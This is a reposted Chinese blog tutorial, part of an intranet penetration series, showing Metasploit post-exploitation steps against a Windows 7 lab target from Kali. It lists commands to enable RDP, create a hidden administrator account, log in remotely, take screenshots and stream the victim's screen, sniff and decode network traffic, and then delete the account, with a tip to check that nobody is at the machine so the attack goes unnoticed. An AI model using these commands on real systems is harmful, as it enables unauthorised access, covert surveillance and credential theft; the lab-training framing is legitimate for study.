内网渗透之内网信息收集(二)

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

目录

Metasploit内网信息收集

05打开并连接3389

06数据包抓取

内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客

攻击机 kali 192.168.0.103

靶机 win7 192.168.0.105

05打开并连接3389

查看3389端口的开放情况

img

开启3389远程桌面

run post/windows/manage/enable_rdp

run getgui -e

img

可以利用该命令在目标机器上添加用户:

run getgui -u admin -p Admin@123456(一些系统密码得满足复杂度才能创建)

net localgroup administrators admin /add(将admin用户添加到管理员组)

img

远程连接桌面

rdesktop -u username -p password ip

img

yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)

img

登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)

img

查看远程桌面

screenshot(截取win7当前屏幕,检查是否有人使用)

img

use espia

screengrab

screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)

img

删除指定账号

run post/windows/manage/delete_user USERNAME=admin

06数据包抓取

抓包

Load sniffer

Sniffer_interfaces

Sniffer_start 2

Sniffer_dump 2 1.cap

解码

Use auxiliary/sniffer/psnuffle

Set PCAPFILE 1.cap

exploit

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125598059
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复